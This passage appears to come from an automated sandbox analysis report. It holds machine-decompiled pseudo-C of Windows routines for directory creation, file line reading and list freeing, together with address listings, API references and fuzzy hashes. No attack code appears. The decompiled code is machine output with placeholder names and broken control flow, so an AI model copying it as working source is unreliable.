												if(_t217 == 0) {
													_t217 =  &_v1084;
												}
												_t277 = _t284 + 1;
												__eflags = _t284 + 1;
												E002B4C89(_v2160, _t284 + 1, _t217, _v556);
												goto L57;
											}
											L23:
											E002B0040( *(_t222 + 4));
											_t194 =  *((intOrPtr*)(_t222 + 0xc));
											_v2180 = _t194;
											_v2160 = 1;
											__eflags =  *((intOrPtr*)(_t222 + 8)) - 1;
											if( *((intOrPtr*)(_t222 + 8)) < 1) {
												L27:
												_t195 = _v2168;
												__eflags = _t195;
												if(_t195 != 0) {
													E002B0040(_t195);
												}
												_v2168 = _t222;
												_t222 =  *_t222;
												continue;
											}
											_t286 = _t194;
											do {
												E002B0040( *_t286);
												E002B0040( *((intOrPtr*)(_t286 + 4)));
												E002B0040(_t286);
												_t286 =  *((intOrPtr*)(_t286 + 0xc));
												_t201 = _v2160 + 1;
												_v2160 = _t201;
												__eflags = _t201 -  *((intOrPtr*)(_t222 + 8));
											} while (_t201 <=  *((intOrPtr*)(_t222 + 8)));
											_t285 = _v2184;
											_t287 = _v2176;
											goto L27;
										}
									}
									_push(0);
									_push(0x40002713);
									E002AC5A2(0);
									goto L10;
								}
								__eflags = _t181 & 0x00020000;
								if((_t181 & 0x00020000) == 0) {
									_t181 = _t181 | 0x00000002;
									__eflags = _t181;
									 *_t285 = _t181;
								}
								goto L18;
							}
							E002AB6CB(_t287);
							goto L12;
						} else {
							goto L10;
						}
					}
				}
			}

































































                                              0x002b2dd2
                                              0x002b2ddd
                                              0x002b2de4
                                              0x002b2dea
                                              0x002b2def
                                              0x002b2df9
                                              0x002b2dfb
                                              0x002b2e06
                                              0x002b2e0c
                                              0x002b2e0e
                                              0x002b2e13
                                              0x002b2e19
                                              0x002b2e1c
                                              0x002b2e24
                                              0x002b2e30
                                              0x002b2e37
                                              0x002b2e40
                                              0x002b2e48
                                              0x002b2e54
                                              0x002b2e5b
                                              0x002b2e64
                                              0x002b2e6c
                                              0x002b2e78
                                              0x002b2e7f
                                              0x002b2e88
                                              0x002b2eae
                                              0x002b2f72
                                              0x002b2f74
                                              0x00000000
                                              0x002b2efe
                                              0x002b2f18
                                              0x002b2f1d
                                              0x002b2f1f
                                              0x00000000
                                              0x002b2f31
                                              0x002b2f31
                                              0x002b2f37
                                              0x002b2f3b
                                              0x002b2f3d
                                              0x002b2f40
                                              0x002b2f40
                                              0x002b2f44
                                              0x002bd999
                                              0x002bd99c
                                              0x002bd99c
                                              0x002b2f4f
                                              0x002bd9a6
                                              0x002bd9a6
                                              0x002b2f5b
                                              0x002b2f64
                                              0x002b2f70
                                              0x002b2fc3
                                              0x002b2fd5
                                              0x002b2fe1
                                              0x002b2fe6
                                              0x002b2fec
                                              0x002b2fec
                                              0x002b2fee
                                              0x00000000
                                              0x00000000
                                              0x002b2ffd
                                              0x002b3002
                                              0x002b3006
                                              0x002b3008
                                              0x002bd9ad
                                              0x002bd9b4
                                              0x002bd9b6
                                              0x002bd9b9
                                              0x002b301a
                                              0x002b301a
                                              0x002b301c
                                              0x002bd9d1
                                              0x002bd9d4
                                              0x002bd9d6
                                              0x002bd9d8
                                              0x002bd9d8
                                              0x002bd9e5
                                              0x002bd9ea
                                              0x002bd9ed
                                              0x002bd9f0
                                              0x002bd9f0
                                              0x002bd9f3
                                              0x002bd9f6
                                              0x002bd9f6
                                              0x002bd9ff
                                              0x002bda04
                                              0x002bda06
                                              0x002bda08
                                              0x002bda0a
                                              0x002bda0a
                                              0x002bda16
                                              0x002bda18
                                              0x002bda1d
                                              0x002bda23
                                              0x002bda25
                                              0x002bda27
                                              0x002bda27
                                              0x002bda2d
                                              0x002bda30
                                              0x002bda32
                                              0x002bda34
                                              0x002bda34
                                              0x002bda3c
                                              0x002bda44
                                              0x002bda46
                                              0x00000000
                                              0x002bda4c
                                              0x002bda4c
                                              0x002bda53
                                              0x002bda64
                                              0x002bda64
                                              0x002bda69
                                              0x002bda6e
                                              0x002bda70
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002bda76
                                              0x002bda57
                                              0x002bda5c
                                              0x002bda5e
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002bda5e
                                              0x002bda46
                                              0x002b3022
                                              0x002b3022
                                              0x002b3028
                                              0x002b302e
                                              0x002b3034
                                              0x002b3037
                                              0x002b303a
                                              0x002b303d
                                              0x002b3043
                                              0x002bda7b
                                              0x002bda7b
                                              0x002b3056
                                              0x002b306c
                                              0x002b306e
                                              0x002b3073
                                              0x002b3078
                                              0x002b307e
                                              0x002b3080
                                              0x002bdb67
                                              0x002bdb67
                                              0x002bdb6e
                                              0x00000000
                                              0x00000000
                                              0x002bdb74
                                              0x002bdb77
                                              0x002bdb88
                                              0x002bdb8b
                                              0x00000000
                                              0x00000000
                                              0x002bdb93
                                              0x002bdb98
                                              0x002bdb9a
                                              0x002bdb9b
                                              0x002bdba0
                                              0x002bdba5
                                              0x002bdbaf
                                              0x00000000
                                              0x002bdbb0
                                              0x002bdb7b
                                              0x002bdb7c
                                              0x002bdb7e
                                              0x00000000
                                              0x002b3086
                                              0x002b3089
                                              0x002b308c
                                              0x002bdb61
                                              0x00000000
                                              0x002bdb61
                                              0x002b3092
                                              0x002b3095
                                              0x002bda8e
                                              0x002bda93
                                              0x002bda95
                                              0x002bda97
                                              0x002bdadd
                                              0x002bdadd
                                              0x002bdae0
                                              0x002bdae2
                                              0x002bdae4
                                              0x002bdae4
                                              0x002bdaea
                                              0x002bdaf0
                                              0x002bdaf2
                                              0x002bdaf4
                                              0x002bdaf4
                                              0x002bdafc
                                              0x002bdb04
                                              0x002bdb06
                                              0x00000000
                                              0x002bdb0c
                                              0x002bdb0c
                                              0x002bdb0f
                                              0x002bdb38
                                              0x002bdb38
                                              0x002bdb3e
                                              0x002bdb40
                                              0x002bdb42
                                              0x002bdb42
                                              0x002bdb4f
                                              0x002bdb54
                                              0x002bdb56
                                              0x002b2f75
                                              0x002b2f75
                                              0x002b2f7b
                                              0x002b2f81
                                              0x002b2f8e
                                              0x002b2f9b
                                              0x002b2fa5
                                              0x002b2fc2
                                              0x002bdb5c
                                              0x00000000
                                              0x002bdb5c
                                              0x002bdb56
                                              0x002bdb13
                                              0x002bdb18
                                              0x002bdb1a
                                              0x00000000
                                              0x00000000
                                              0x002bdb22
                                              0x002bdb2b
                                              0x002bdb30
                                              0x002bdb32
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002bdb32
                                              0x002bdb06
                                              0x002bda99
                                              0x002bda9c
                                              0x002bda9e
                                              0x002bdaa4
                                              0x002bdaa7
                                              0x002bdaa7
                                              0x002bdaaa
                                              0x002bdaad
                                              0x002bdaad
                                              0x002bdab6
                                              0x002bdabe
                                              0x002bdac0
                                              0x002bdac2
                                              0x002bdac4
                                              0x002bdac4
                                              0x002bdad6
                                              0x002bdad6
                                              0x002bdad8
                                              0x00000000
                                              0x002bdad8
                                              0x002b309b
                                              0x002b309e
                                              0x002b30a3
                                              0x002b30a9
                                              0x002b30af
                                              0x002b30b5
                                              0x002b30b8
                                              0x002b30f5
                                              0x002b30f5
                                              0x002b30fb
                                              0x002b30fd
                                              0x002b311a
                                              0x002b311a
                                              0x002b30ff
                                              0x002b3105
                                              0x00000000
                                              0x002b3105
                                              0x002b30ba
                                              0x002b30bc
                                              0x002b30c1
                                              0x002b30c9
                                              0x002b30d0
                                              0x002b30db
                                              0x002b30dd
                                              0x002b30de
                                              0x002b30e4
                                              0x002b30e4
                                              0x002b30e9
                                              0x002b30ef
                                              0x00000000
                                              0x002b30ef
                                              0x002b3080
                                              0x002bd9bf
                                              0x002bd9c0
                                              0x002bd9c5
                                              0x00000000
                                              0x002bd9cb
                                              0x002b300e
                                              0x002b3013
                                              0x002b3015
                                              0x002b3015
                                              0x002b3018
                                              0x002b3018
                                              0x00000000
                                              0x002b3013
                                              0x002b310e
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002b2f70
                                              0x002b2f1f

                                              APIs
                                              • memset.MSVCRT ref: 002B2E1C
                                              • memset.MSVCRT ref: 002B2E40
                                              • memset.MSVCRT ref: 002B2E64
                                              • memset.MSVCRT ref: 002B2E88
                                                • Part of subcall function 002B0C70: ??_V@YAXPAX@Z.MSVCRT ref: 002B0CBA
                                                • Part of subcall function 002B0C70: memset.MSVCRT ref: 002B0CDD
                                              • ??_V@YAXPAX@Z.MSVCRT ref: 002B2F81
                                              • ??_V@YAXPAX@Z.MSVCRT ref: 002B2F8E
                                              • ??_V@YAXPAX@Z.MSVCRT ref: 002B2F9B
                                              • ??_V@YAXPAX@Z.MSVCRT ref: 002B2FA5
                                                • Part of subcall function 002B4E94: GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,002B2F2C,-00000001,-00000001,-00000001,-00000001), ref: 002B4ED6
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: memset$BufferConsoleInfoScreen
                                              • String ID:
                                              • API String ID: 1034426908-0
                                              • Opcode ID: 18f2bc6340f5efcd651a568f6664d3dc0e22fd9bc0375b8b71a5bed968cdc7ca
                                              • Instruction ID: 41f460e508fe50869695b9c0223336a6175bcc9fb5635705b3721dc31918a89d
                                              • Opcode Fuzzy Hash: 18f2bc6340f5efcd651a568f6664d3dc0e22fd9bc0375b8b71a5bed968cdc7ca
                                              • Instruction Fuzzy Hash: B1E1C67192021A9BDB24DF25CC85BEAB7B5FF44384F1441A9E84997241EF35EEA0CF90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002ABF30, Relevance: 15.3, APIs: 10, Instructions: 259COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 48%
                                              			E002ABF30(short* __edx, WCHAR* _a4) {
				signed int _v8;
				long _v20;
				char _v24;
				int _v28;
				void _v548;
				WCHAR* _v552;
				short* _v556;
				short* _v560;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t47;
				void* _t49;
				long _t59;
				struct _SECURITY_ATTRIBUTES* _t61;
				WCHAR* _t63;
				long _t64;
				WCHAR* _t67;
				WCHAR* _t68;
				WCHAR* _t69;
				signed int _t70;
				signed int _t71;
				short* _t73;
				void* _t74;
				WCHAR* _t76;
				WCHAR* _t80;
				signed int _t81;
				signed int _t82;
				struct _SECURITY_ATTRIBUTES* _t86;
				signed int _t88;
				short* _t89;
				signed int _t97;
				short* _t100;
				WCHAR* _t101;
				WCHAR* _t103;
				WCHAR* _t104;
				struct _SECURITY_ATTRIBUTES* _t105;
				void* _t106;
				signed int _t107;

				_t100 = __edx;
				_t47 =  *0x2cd0b4; // 0x40f69e4c
				_v8 = _t47 ^ _t107;
				_t104 = _a4;
				_t49 = 0x3a;
				if(_t104[1] != _t49) {
					L2:
					_t105 = 0;
					_v20 = 0x104;
					_v28 = 0;
					_t86 = 1;
					_v24 = 1;
					memset( &_v548, 0, 0x104);
					_t91 =  &_v548;
					if(E002B0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
						_t59 = 8;
						L39:
						_push(_t105);
						_push(_t59);
						L40:
						E002AC5A2(_t91);
						L8:
						_t105 = _t86;
						L9:
						__imp__??_V@YAXPAX@Z(_v28);
						_t61 = _t105;
						L10:
						return E002B6FD0(_t61, _t86, _v8 ^ _t107, _t100, _t104, _t105);
					}
					_t63 = _v28;
					if(_t63 == 0) {
						_t63 =  &_v548;
					}
					_t91 =  &_v552;
					_t64 = GetFullPathNameW(_t104, _v20, _t63,  &_v552);
					if(_t64 == 0) {
						_t59 = GetLastError();
						goto L39;
					} else {
						if(_t64 >= 0x7fe7) {
							_push(_t104);
							_push(_t86);
							_push(0x400023d9);
							L43:
							E002AC5A2(_t91);
							goto L8;
						}
						if(CreateDirectoryW(_t104, _t105) == 0) {
							_t59 = GetLastError();
							if(_t59 == 0xb7) {
								_push(_t104);
								_push(_t86);
								_push(0x235c);
								goto L43;
							}
							if(_t59 != 3) {
								goto L39;
							}
							if( *0x2e3cc9 == 0) {
								L29:
								_push(_t105);
								_push(0x52);
								goto L40;
							}
							_t91 = _v28;
							_t67 = _t91;
							if(_t91 == 0) {
								_t67 =  &_v548;
							}
							_t100 = 0x5c;
							_t104 = 0x3a;
							_v560 = _t100;
							if(_t67[1] != _t104) {
								_t68 = _t91;
								if(_t91 == 0) {
									_t68 =  &_v548;
								}
								if( *_t68 != _t100) {
									goto L29;
								} else {
									_t69 = _t91;
									if(_t91 == 0) {
										_t69 =  &_v548;
									}
									if(_t69[1] != _t100) {
										goto L29;
									} else {
										_t101 = _t91;
										if(_t91 == 0) {
											_t101 =  &_v548;
										}
										_t100 =  &(_t101[2]);
										_v552 = _t100;
										_t104 = _t100;
										_t70 =  *_t100 & 0x0000ffff;
										if(_t70 == 0) {
											L59:
											if( *_t100 != _t105) {
												_t100 =  &(_t104[1]);
												_v552 = _t100;
												_t104 = _t100;
											}
											_t71 =  *_t100 & 0x0000ffff;
											if(_t71 == 0) {
												goto L30;
											}
											_v556 = _t71;
											_t88 = _t71;
											while(1) {
												_t73 = _t104;
												if(_t88 == _v560) {
													break;
												}
												_t100 =  &(_t104[1]);
												_v552 = _t100;
												_t104 = _t100;
												_t81 =  *_t100 & 0x0000ffff;
												_v556 = _t100;
												_t88 = _t81;
												if(_t81 != 0) {
													continue;
												}
												_t73 = _t100;
												break;
											}
											_t86 = 1;
											if( *_t100 == _t105) {
												goto L30;
											}
											_t100 =  &(_t73[1]);
											goto L19;
										}
										_t89 = _t100;
										_t97 = _t70;
										_t106 = 0x5c;
										while(1) {
											_t104 = _t89;
											if(_t97 == _t106) {
												break;
											}
											_t100 =  &(_t89[1]);
											_v552 = _t100;
											_t89 = _t100;
											_t82 =  *_t100 & 0x0000ffff;
											_t104 = _t100;
											_t97 = _t82;
											if(_t82 != 0) {
												continue;
											}
											break;
										}
										_t91 = _v28;
										_t86 = 1;
										_t105 = 0;
										goto L59;
									}
								}
							} else {
								_t103 = _t91;
								if(_t91 == 0) {
									_t103 =  &_v548;
								}
								_t100 =  &(_t103[3]);
								while(1) {
									L19:
									_v552 = _t100;
									while(1) {
										L20:
										_t104 =  *_t100 & 0x0000ffff;
										if(_t104 == 0) {
											break;
										} else {
											goto L21;
										}
										while(1) {
											L21:
											_t74 = 0x5c;
											if(_t104 == _t74) {
												break;
											}
											_t100 =  &(_t100[1]);
											_v552 = _t100;
											_t80 =  *_t100 & 0x0000ffff;
											_t104 = _t80;
											if(_t80 != 0) {
												continue;
											}
											_t104 = 0x5c;
											if( *_t100 != _t104) {
												goto L20;
											}
											L26:
											 *_t100 = 0;
											_t76 = _v28;
											if(_t76 == 0) {
												_t76 =  &_v548;
											}
											if(CreateDirectoryW(_t76, _t105) != 0 || GetLastError() == 0xb7) {
												 *_v552 = _t104;
												_t91 = _v28;
												_t100 =  &(_v552[1]);
												goto L19;
											} else {
												goto L29;
											}
										}
										_t104 = 0x5c;
										goto L26;
									}
									L30:
									if(_t91 == 0) {
										_t91 =  &_v548;
									}
									if(CreateDirectoryW(_t91, _t105) != 0) {
										goto L9;
									} else {
										_t59 = GetLastError();
										if(_t59 == 0xb7) {
											goto L9;
										} else {
											goto L39;
										}
									}
								}
							}
						}
						_t86 = _t105;
						goto L8;
					}
				}
				_t98 =  *_t104;
				if(E002B29BB( *_t104) == 0) {
					_push(0);
					_push(0xf);
					E002AC5A2(_t98);
					_t61 = 1;
					goto L10;
				}
				goto L2;
			}










































                                              0x002abf30
                                              0x002abf3b
                                              0x002abf42
                                              0x002abf48
                                              0x002abf4d
                                              0x002abf52
                                              0x002abf64
                                              0x002abf69
                                              0x002abf6c
                                              0x002abf77
                                              0x002abf7b
                                              0x002abf7d
                                              0x002abf80
                                              0x002abf87
                                              0x002abfa9
                                              0x002ba3d6
                                              0x002ba3ea
                                              0x002ba3ea
                                              0x002ba3eb
                                              0x002ba3ec
                                              0x002ba3ec
                                              0x002abfed
                                              0x002abfed
                                              0x002abfef
                                              0x002abff2
                                              0x002abff8
                                              0x002abffa
                                              0x002ac00b
                                              0x002ac00b
                                              0x002abfaf
                                              0x002abfb4
                                              0x002ba3d9
                                              0x002ba3d9
                                              0x002abfba
                                              0x002abfc6
                                              0x002abfce
                                              0x002ba3e4
                                              0x00000000
                                              0x002abfd4
                                              0x002abfd9
                                              0x002ba3f8
                                              0x002ba3f9
                                              0x002ba3fa
                                              0x002ba408
                                              0x002ba408
                                              0x00000000
                                              0x002ba40d
                                              0x002abfe9
                                              0x002ac00e
                                              0x002ac019
                                              0x002ba401
                                              0x002ba402
                                              0x002ba403
                                              0x00000000
                                              0x002ba403
                                              0x002ac022
                                              0x00000000
                                              0x00000000
                                              0x002ac02f
                                              0x002ac0d7
                                              0x002ac0d7
                                              0x002ac0d8
                                              0x00000000
                                              0x002ac0d8
                                              0x002ac035
                                              0x002ac038
                                              0x002ac03c
                                              0x002ba415
                                              0x002ba415
                                              0x002ac044
                                              0x002ac047
                                              0x002ac048
                                              0x002ac052
                                              0x002ba42b
                                              0x002ba42f
                                              0x002ba431
                                              0x002ba431
                                              0x002ba43a
                                              0x00000000
                                              0x002ba440
                                              0x002ba440
                                              0x002ba444
                                              0x002ba446
                                              0x002ba446
                                              0x002ba450
                                              0x00000000
                                              0x002ba456
                                              0x002ba456
                                              0x002ba45a
                                              0x002ba45c
                                              0x002ba45c
                                              0x002ba462
                                              0x002ba465
                                              0x002ba46b
                                              0x002ba46d
                                              0x002ba473
                                              0x002ba4a2
                                              0x002ba4a5
                                              0x002ba4a7
                                              0x002ba4aa
                                              0x002ba4b0
                                              0x002ba4b0
                                              0x002ba4b2
                                              0x002ba4b8
                                              0x00000000
                                              0x00000000
                                              0x002ba4be
                                              0x002ba4c4
                                              0x002ba4c6
                                              0x002ba4c6
                                              0x002ba4cf
                                              0x00000000
                                              0x00000000
                                              0x002ba4d1
                                              0x002ba4d4
                                              0x002ba4da
                                              0x002ba4dc
                                              0x002ba4df
                                              0x002ba4e5
                                              0x002ba4ea
                                              0x00000000
                                              0x00000000
                                              0x002ba4ec
                                              0x00000000
                                              0x002ba4ec
                                              0x002ba4f0
                                              0x002ba4f4
                                              0x00000000
                                              0x00000000
                                              0x002ba4fa
                                              0x00000000
                                              0x002ba4fa
                                              0x002ba477
                                              0x002ba479
                                              0x002ba47b
                                              0x002ba47c
                                              0x002ba47c
                                              0x002ba481
                                              0x00000000
                                              0x00000000
                                              0x002ba483
                                              0x002ba486
                                              0x002ba48c
                                              0x002ba48e
                                              0x002ba491
                                              0x002ba493
                                              0x002ba498
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002ba498
                                              0x002ba49a
                                              0x002ba49f
                                              0x002ba4a0
                                              0x00000000
                                              0x002ba4a0
                                              0x002ba450
                                              0x002ac058
                                              0x002ac058
                                              0x002ac05c
                                              0x002ba420
                                              0x002ba420
                                              0x002ac062
                                              0x002ac07c
                                              0x002ac07c
                                              0x002ac07c
                                              0x002ac082
                                              0x002ac082
                                              0x002ac082
                                              0x002ac088
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002ac08a
                                              0x002ac08a
                                              0x002ac08c
                                              0x002ac090
                                              0x00000000
                                              0x00000000
                                              0x002ac092
                                              0x002ac095
                                              0x002ac09b
                                              0x002ac09e
                                              0x002ac0a3
                                              0x00000000
                                              0x00000000
                                              0x002ac0a7
                                              0x002ac0ab
                                              0x00000000
                                              0x00000000
                                              0x002ac0b2
                                              0x002ac0b4
                                              0x002ac0b7
                                              0x002ac0bc
                                              0x002ac0f8
                                              0x002ac0f8
                                              0x002ac0c8
                                              0x002ac06d
                                              0x002ac076
                                              0x002ac079
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002ac0c8
                                              0x002ac0b1
                                              0x00000000
                                              0x002ac0b1
                                              0x002ac0df
                                              0x002ac0e1
                                              0x002ac100
                                              0x002ac100
                                              0x002ac0ed
                                              0x00000000
                                              0x002ac0f3
                                              0x002ba502
                                              0x002ba50d
                                              0x00000000
                                              0x002ba513
                                              0x00000000
                                              0x002ba513
                                              0x002ba50d
                                              0x002ac0ed
                                              0x002ac07c
                                              0x002ac052
                                              0x002abfeb
                                              0x00000000
                                              0x002abfeb
                                              0x002abfce
                                              0x002abf54
                                              0x002abf5e
                                              0x002ba3c2
                                              0x002ba3c4
                                              0x002ba3c6
                                              0x002ba3ce
                                              0x00000000
                                              0x002ba3ce
                                              0x00000000

                                              APIs
                                              • memset.MSVCRT ref: 002ABF80
                                              • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,-00000105), ref: 002ABFC6
                                              • CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000), ref: 002ABFE1
                                              • ??_V@YAXPAX@Z.MSVCRT ref: 002ABFF2
                                                • Part of subcall function 002B29BB: GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(002B0B22,002B0B22,00007FE7), ref: 002B29E9
                                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 002AC00E
                                              • CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000), ref: 002AC0C0
                                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 002AC0CA
                                              • CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000), ref: 002AC0E5
                                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 002BA502
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: CreateDirectoryErrorLast$DriveFullNamePathTypememset
                                              • String ID:
                                              • API String ID: 402963468-0
                                              • Opcode ID: 277bc8d36e0dabb0eb7492cc9a1101eac6252920a4deb85b7aa38c7de6d5884c
                                              • Instruction ID: 779b7d7fcfb290d9a2eefcb24d8ecf8d8feaaca7015223591037ef46d1def899
                                              • Opcode Fuzzy Hash: 277bc8d36e0dabb0eb7492cc9a1101eac6252920a4deb85b7aa38c7de6d5884c
                                              • Instruction Fuzzy Hash: B681F630A20217DBDB34DF55DC89BBAB7B4EF49750F2480A6E509D7190EBB08D90CB51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002C396E, Relevance: 15.2, APIs: 10, Instructions: 153fileCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 45%
                                              			E002C396E(void* __ecx, short* __edx, long _a4, DWORD* _a8) {
				long _v8;
				char* _v12;
				long _v16;
				void* _v20;
				int _v24;
				short* _v28;
				int _t36;
				signed int _t38;
				int _t41;
				int _t52;
				void* _t54;
				char* _t55;
				int _t57;
				int _t58;
				void _t60;
				int _t62;
				void* _t65;
				DWORD* _t67;

				_t65 = __ecx;
				_v28 = __edx;
				_v20 = __ecx;
				_t54 = 0x2cd620;
				_v16 = SetFilePointer(__ecx, 0, 0, 1);
				if(_a4 >= 0x1fff) {
					_a4 = 0x1fff;
				}
				__imp__AcquireSRWLockShared(0x2e7f20);
				_t36 = ReadFile(_t65, _t54, _a4, _a8, 0);
				__imp__ReleaseSRWLockShared(0x2e7f20);
				if(_t36 != 0) {
					_t67 = _a8;
					_t62 =  *_t67;
					if(_t62 == 0) {
						goto L3;
					}
					_t57 = _t62;
					_v8 = _t62;
					if( *0x2d3854 == 0xfde9 && _v16 == 0 && _a4 > 3) {
						_push(3);
						_push(0x2a3270);
						_push(_t54);
						L002B82C7();
						_t57 = _t62;
						if(_t36 == 0) {
							_t62 = _t62 + 0xfffffffd;
							_v16 = 3;
							_t54 = 0x2cd623;
							 *_t67 = _t62;
							_v8 = _t62;
							_t57 = _t62;
						}
					}
					_v12 = _t54;
					if(_t62 <= 0) {
						L21:
						_t55 = _v12;
						goto L22;
					} else {
						do {
							if(_t57 < 3) {
								L16:
								if( *((char*)(( *_t54 & 0x000000ff) + 0x2e7f30)) == 0) {
									_t57 = _t57 - 1;
									goto L20;
								}
								if(_t57 == 1) {
									__imp__AcquireSRWLockShared(0x2e7f20);
									_t28 = _t54 + 1; // 0x2cd621
									_t52 = ReadFile(_v20, _t28, 1,  &_v8, 0);
									__imp__ReleaseSRWLockShared(0x2e7f20);
									if(_t52 == 0 || _v8 == 0) {
										 *_a8 =  *_a8 & 0x00000000;
										goto L3;
									} else {
										_t67 = _a8;
										_t62 = _t62 + 1;
										goto L21;
									}
								}
								_push(2);
								_t57 = _t57 + 0xfffffffe;
								_pop(1);
								goto L20;
							}
							_t60 =  *_t54;
							if(_t60 != 0xa ||  *(_t54 + 1) != 0xd) {
								_v24 = _t57;
								if(_t60 != 0xd ||  *(_t54 + 1) != 0xa) {
									goto L16;
								} else {
									goto L24;
								}
							} else {
								L24:
								 *((char*)(_t54 + 2)) = 0;
								_t55 = _v12;
								_t62 = _t54 - _t55 + 2;
								SetFilePointer(_v20, _v16 + _t62, 0, 0);
								L22:
								_t58 =  *0x2d3854;
								_t38 = E002B0638(_t58);
								asm("sbb eax, eax");
								_t41 = MultiByteToWideChar(_t58,  ~( ~_t38), _t55, _t62, _v28, _a4);
								 *_t67 = _t41;
								return _t41;
							}
							L20:
							_t54 = _t54 + 1;
							_v8 = _t57;
						} while (_t57 > 0);
						goto L21;
					}
				} else {
					L3:
					return 0;
				}
			}





















                                              0x002c397d
                                              0x002c397f
                                              0x002c3985
                                              0x002c3988
                                              0x002c3993
                                              0x002c399e
                                              0x002c39a0
                                              0x002c39a0
                                              0x002c39a9
                                              0x002c39ba
                                              0x002c39c3
                                              0x002c39cb
                                              0x002c39d4
                                              0x002c39d7
                                              0x002c39db
                                              0x00000000
                                              0x00000000
                                              0x002c39e7
                                              0x002c39e9
                                              0x002c39ec
                                              0x002c39fa
                                              0x002c39fc
                                              0x002c3a01
                                              0x002c3a02
                                              0x002c3a0a
                                              0x002c3a0e
                                              0x002c3a10
                                              0x002c3a13
                                              0x002c3a1a
                                              0x002c3a1f
                                              0x002c3a21
                                              0x002c3a24
                                              0x002c3a24
                                              0x002c3a0e
                                              0x002c3a26
                                              0x002c3a2b
                                              0x002c3a75
                                              0x002c3a75
                                              0x00000000
                                              0x002c3a2d
                                              0x002c3a2d
                                              0x002c3a30
                                              0x002c3a4f
                                              0x002c3a59
                                              0x002c3a6a
                                              0x00000000
                                              0x002c3a6b
                                              0x002c3a5e
                                              0x002c3acb
                                              0x002c3ad9
                                              0x002c3ae0
                                              0x002c3aed
                                              0x002c3af5
                                              0x002c3b09
                                              0x00000000
                                              0x002c3afd
                                              0x002c3afd
                                              0x002c3b00
                                              0x00000000
                                              0x002c3b00
                                              0x002c3af5
                                              0x002c3a60
                                              0x002c3a62
                                              0x002c3a65
                                              0x00000000
                                              0x002c3a65
                                              0x002c3a32
                                              0x002c3a37
                                              0x002c3a3f
                                              0x002c3a47
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002c3aa4
                                              0x002c3aa4
                                              0x002c3aa9
                                              0x002c3aac
                                              0x002c3ab5
                                              0x002c3abe
                                              0x002c3a78
                                              0x002c3a78
                                              0x002c3a7e
                                              0x002c3a8b
                                              0x002c3a93
                                              0x002c3a99
                                              0x00000000
                                              0x002c3a99
                                              0x002c3a6c
                                              0x002c3a6c
                                              0x002c3a6e
                                              0x002c3a71
                                              0x00000000
                                              0x002c3a2d
                                              0x002c39cd
                                              0x002c39cd
                                              0x00000000
                                              0x002c39cd

                                              APIs
                                              • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000,00000001,0000000A,00000000,00000001,?,002C3B43,?,?,?,002C977C), ref: 002C398D
                                              • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(002E7F20,?,002C3B43,?,?,?,002C977C), ref: 002C39A9
                                              • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,002CD620,?,?,00000000,?,002C3B43,?,?,?,002C977C), ref: 002C39BA
                                              • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(002E7F20,?,002C3B43,?,?,?,002C977C), ref: 002C39C3
                                              • memcmp.MSVCRT ref: 002C3A02
                                              • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,00000000,?,002E7F20,?,?,?,002C3B43,?,?,?,002C977C), ref: 002C3A93
                                              • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00000000,?,002C3B43,?,?,?,002C977C), ref: 002C3ABE
                                              • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(002E7F20,?,002C3B43,?,?,?,002C977C), ref: 002C3ACB
                                              • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(?,002CD621,00000001,002C977C,00000000,?,002C3B43,?,?,?,002C977C), ref: 002C3AE0
                                              • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(002E7F20,?,002C3B43,?,?,?,002C977C), ref: 002C3AED
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
